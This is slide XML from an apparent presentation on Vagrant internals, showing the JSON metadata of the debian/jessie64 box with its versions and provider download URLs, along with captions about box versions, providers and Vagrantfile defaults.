          <a:p>
            <a:pPr marL="75565" marR="1821814" indent="-63500">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pP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{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# </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>Content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of https://vagrantcloud.com/debian/jessie64.json  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”description”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”Vanilla Debian 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>\”Jessie\””</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  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”name”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”debian/jessie64”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565">
              <a:lnSpc>
                <a:spcPts val="660"/>
              </a:lnSpc>
            </a:pP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”versions”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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[</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139065">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
            </a:pP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{</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pP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”version”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”8.5.1”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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1</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="160"/>
              </a:spcBef>
            </a:pP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”status”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”active”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>
              </a:spcBef>
            </a:pP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”providers”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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[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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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2</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="195"/>
              </a:spcBef>
            </a:pP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{</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="328930" marR="5080">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pP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”name”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”virtualbox”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  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”url”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”https://atlas.hashicorp.com/debian/boxes/jessie64/versions/8.5.1/providers/virtualbox.box”</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="665"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
            </a:pP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{</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="328930" marR="307340">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pP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”name”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”lxc”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  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”url”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”https://atlas.hashicorp.com/debian/boxes/jessie64/versions/8.5.1/providers/lxc.box”</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="665"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPts val="695"/>
              </a:lnSpc>
            </a:pP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]</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139065">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565">
              <a:lnSpc>
                <a:spcPts val="695"/>
              </a:lnSpc>
            </a:pP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]</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="74295">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>versions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>one </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>box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possible.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6546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>25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417" y="190436"/>
            <a:ext cx="1871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sz="1200" spc="-150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INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-295" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-185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DOWNLOAD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9905" y="1478695"/>
            <a:ext cx="144199" cy="1442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7247" y="1715550"/>
            <a:ext cx="144194" cy="1442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8589" y="699201"/>
            <a:ext cx="4394200" cy="2232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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Metadata</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565" marR="1821814" indent="-63500">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pP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{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# </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>Content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of https://vagrantcloud.com/debian/jessie64.json  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”description”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”Vanilla Debian 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>\”Jessie\””</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  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”name”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”debian/jessie64”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565">
              <a:lnSpc>
                <a:spcPts val="660"/>
              </a:lnSpc>
            </a:pP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”versions”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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[</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139065">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
            </a:pP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{</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pP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”version”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”8.5.1”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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1</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="160"/>
              </a:spcBef>
            </a:pP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”status”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”active”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>
              </a:spcBef>
            </a:pP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”providers”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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[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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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2</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="195"/>
              </a:spcBef>
            </a:pP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{</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="328930" marR="5080">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pP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”name”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”virtualbox”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  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”url”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”https://atlas.hashicorp.com/debian/boxes/jessie64/versions/8.5.1/providers/virtualbox.box”</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="665"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
            </a:pP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{</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="328930" marR="307340">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pP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”name”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”lxc”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  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”url”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>: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”https://atlas.hashicorp.com/debian/boxes/jessie64/versions/8.5.1/providers/lxc.box”</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="265430">
              <a:lnSpc>
                <a:spcPts val="665"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="202565">
              <a:lnSpc>
                <a:spcPts val="695"/>
              </a:lnSpc>
            </a:pP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]</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139065">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565">
              <a:lnSpc>
                <a:spcPts val="695"/>
              </a:lnSpc>
            </a:pP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]</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
            </a:pP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}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1304" y="2964703"/>
            <a:ext cx="190723" cy="190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1072" y="2972433"/>
            <a:ext cx="2310130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0"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>providers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>one </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>version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possible.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6546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>25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589" y="190436"/>
            <a:ext cx="1899920" cy="716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sz="1200" spc="-150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INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-295" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-185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DOWNLOAD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140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boxes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82645" y="1061297"/>
            <a:ext cx="3643629" cy="1663700"/>
            <a:chOff x="482645" y="1061297"/>
            <a:chExt cx="3643629" cy="1663700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="482645" y="1536209"/>
              <a:ext cx="1071679" cy="11887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54060" y="1061297"/>
              <a:ext cx="1499628" cy="16634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54095" y="1536209"/>
              <a:ext cx="1071679" cy="118875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5702" y="2850418"/>
            <a:ext cx="1726564" cy="2044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140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Vagrantfile</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-140" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Default</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-18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Configuration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7747" y="2881764"/>
            <a:ext cx="104139" cy="1270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40"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="800" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:latin typeface="Aroania"/>
              <a:cs typeface="Aroan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76546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>26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589" y="190436"/>
            <a:ext cx="1899920" cy="716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sz="1200" spc="-150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INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-295" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-185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DOWNLOAD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140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boxes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82645" y="1061297"/>
            <a:ext cx="3643629" cy="1663700"/>
            <a:chOff x="482645" y="1061297"/>
            <a:chExt cx="3643629" cy="1663700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="482645" y="1536209"/>
              <a:ext cx="1071679" cy="11887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54060" y="1061297"/>
              <a:ext cx="1499628" cy="16634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54095" y="1536209"/>
              <a:ext cx="1071679" cy="118875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5702" y="2850418"/>
            <a:ext cx="1744980" cy="2044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170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
